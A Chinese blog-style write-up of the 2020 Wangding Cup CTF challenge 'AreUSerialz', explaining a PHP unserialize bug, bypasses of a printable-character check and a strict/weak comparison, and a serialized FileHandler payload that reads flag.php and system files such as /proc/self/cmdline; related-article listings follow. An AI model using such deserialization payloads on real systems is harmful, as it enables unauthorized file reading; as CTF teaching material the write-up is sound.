网鼎杯2020php反序列化,网鼎杯2020[青龙组]--AreUSerialz

最新推荐文章于 2022-07-25 19:47:11 发布
最新推荐文章于 2022-07-25 19:47:11 发布
阅读量329 收藏
点赞数
文章标签: 网鼎杯2020php反序列化

知识点:

PHP反序列化漏洞

弱类型比较

process();

}

public function process() {

if($this->op == "1") {

$this->write();

} else if($this->op == "2") {

$res = $this->read();

$this->output($res);

} else {

$this->output("Bad Hacker!");

}

}

private function write() {

if(isset($this->filename) && isset($this->content)) {

if(strlen((string)$this->content) > 100) {

$this->output("Too long!");

die();

}

$res = file_put_contents($this->filename, $this->content);

if($res) $this->output("Successful!");

else $this->output("Failed!");

} else {

$this->output("Failed!");

}

}

private function read() {

$res = "";

if(isset($this->filename)) {

$res = file_get_contents($this->filename);

}

return $res;

}

private function output($s) {

echo "[Result]:

";

echo $s;

}

function __destruct() {

if($this->op === "2")

$this->op = "1";

$this->content = "";

$this->process();

}

}

function is_valid($s) {

for($i = 0; $i < strlen($s); $i++)

if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))

return false;

return true;

}

if(isset($_GET{'str'})) {

$str = (string)$_GET['str'];

if(is_valid($str)) {

$obj = unserialize($str);

}

}

PHP反序列化的漏洞,通过控制read()读取flag.php的内容。

需要绕过两个地方:

1、is_valid()函数规定字符的ASCII码必须是32-125,而protected属性在序列化后会出现不可见字符\00*\00,转化为ASCII码不符合要求。

绕过方法:

①PHP7.1以上版本对属性类型不敏感,public属性序列化不会出现不可见字符,可以用public属性来绕过

②private属性序列化的时候会引入两个\x00,注意这两个\x00就是ascii码为0的字符。这个字符显示和输出可能看不到,甚至导致截断,但是url编码后就可以看得很清楚了。同理,protected属性会引入\x00*\x00。此时,为了更加方便进行反序列化Payload的传输与显示,我们可以在序列化内容中用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制表示。

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:7:"oavinci";}

2、__destruct()魔术方法中,op==="2"是强比较,而process()使用的是弱比较op=="2",可以通过弱类型绕过。

绕过方法:op=2,这里的2是整数int类型,op=2时,op==="2"为false,op=="2"为true

题解操作:(这里使用绕过is_valid()函数的第一种方法,利用public属性序列化)

查看源代码得到flag

2cc970e18474992ec59164cd6f3cb5ba.png

或者使用PHP伪协议读取flag.php:

得到base64解码得到flag

4d4d15e46e898c5d31245674f50a0b8d.png

BUU复现的这道题不用考虑flag.php的路径问题,看了参赛大佬WP比赛环境的题目还要靠读取系统配置文件、容器配置文件来猜flag的绝对路径。

首先读取/proc/self/cmdline,得到如下结果。

fab037b77b7cb3bc21b070e6846ef801.png得到取配置文件路径/web/config/httpd.conf,读取后获得网站的绝对路径。

7d21c53d56cb9ab39fcfd68a1eacf0e2.png

然后读取/web/html/flag.php,得到flag

Linda Jiang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网鼎杯2022白虎题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎,ctf
CTFer成长之路之任意文件读取漏洞
众生度尽,方证菩提
02-21 1157
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
[网鼎杯 2020 青龙]AreUSerialz
weixin_61951055的博客
07-25 1106
[网鼎杯 2020 青龙]AreUSerialz
网鼎杯php反序列化 AreUserialz
weixin_54431413的博客
04-16 2186
2020网鼎杯php反序列化AreUserialz
PHP反序列化漏洞&网鼎杯ctf实例
weixin_44769042的博客
09-22 1098
漏洞简介 php反序列化漏洞,又叫php对象注入漏洞。 简单来讲,就是在php反序列化的时候,反序列化的内容是用户可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函数进行特定的反序列化操作,并且程序的某处存在一些敏感操作是写在类中的,那么就可以通过这段恶意代码,达到执行攻击者想要的操作。 漏洞形成原因 漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。 什么是序.
BUUCTF之[网鼎杯 2020 朱雀]phpweb ------- 反序列化
weixin_44632787的博客
06-25 708
BUUCTF之[网鼎杯 2020 朱雀]phpweb ------- 反序列化 题目 Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
64-64.渗透测试-PHP序列化与反序列化.mp4
最新发布
05-10
64-64.渗透测试-PHP序列化与反序列化.mp4
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介Web应用软件的基于Java的Web应用软件容器。0x02 漏洞概述这次是由于错误配置和 org.apache
[网鼎杯 2020 朱雀]phpweb 待续
zxnimud5的专栏
09-13 504
抓包看参数 联想到函数 读index.php代码 func=file_get_contents&p=index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapesh...
PHP反序列化-2020-网鼎杯-青龙-Web-AreUSerialz
m0_62770485的博客
04-17 3180
PHP反序列化 序列化(serialize)就是将对象转换为字符串。反序列化(unserialize)则相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象 访问控制 PHP 对属性或方法的访问控制,是通过在前面添加关键字 public(公有),protected(受保护)或 private(私有)来实现的。 public(公有):公有的类成员可以在任何地方被访问。 protected(受保护):受保护的类成员则可以被其自身以及其子类和父类访问。 private(私有):私有的类
[网鼎杯 2018]Fakebook——SSRF/反序列化漏洞/SQL注入
sGanYu
09-29 3503
解法一 解法二 解法三 考点 • 目录扫描 • SSRF • SQL注入 • PHP反序列化 前言:当我们拿到网站的时候,首先需要对这个网站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞 开始之前,先扫描一下该网站下目录,查看有什么敏感信息泄露 直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个
2020网鼎杯青龙)--WEB--AreUSerialz反序列化
a965527596的博客
05-17 2296
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
网鼎杯2020php反序列化,2020-网鼎杯(青龙)_Web题目 AreUserialz Writeup
weixin_39942992的博客
04-15 218
0x02 AreUSerialz关于s大写小写问题,可以看p神在圈子里发的,我在最后付上截图考点: php反序列化 php特性 利用链构造1.打开页面得到代码如下:include("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;...
网鼎杯2020php反序列化,[BUUCTF-WEB] [网鼎杯 2020 青龙]AreUSerialz
weixin_39846289的博客
04-15 187
SubjectPHP 代码审计 DeserializeMind Palace粗略扫一眼代码,基本确定是反序列化漏洞:function is_valid($s){for($i = 0; $i < strlen($s); $i++)// string: s[i] is between ' ' to '}'if(!(ord($s[$i]) >= 32 && ord($s[$i...
反序列化类型CTF题目总结
Lelouch_E的博客
11-25 1662
反序列化CTF题总结buu NiZhuanSiWeiareuserialz buu NiZhuanSiWei 主页是一段php代码,审计:     有file_get_content(),可以利用伪协议写入‘welcome to the zjctf '过判断;     同时看到提示有useless.php ,可以利用include()读一下文件     构造payload: ?text
protected反序列化特点
qq_48511129的博客
12-13 1032
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hel
如何使用protobuf-net进行序列化和反序列化
04-19
protobuf-net是一个用于序列化和反序列化的库,它是Google Protocol Buffers的一个.NET实现。下面是使用protobuf-net进行序列化和反序列化的步骤: 1. 定义消息结构:首先,你需要定义你的消息结构,可以使用.proto...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值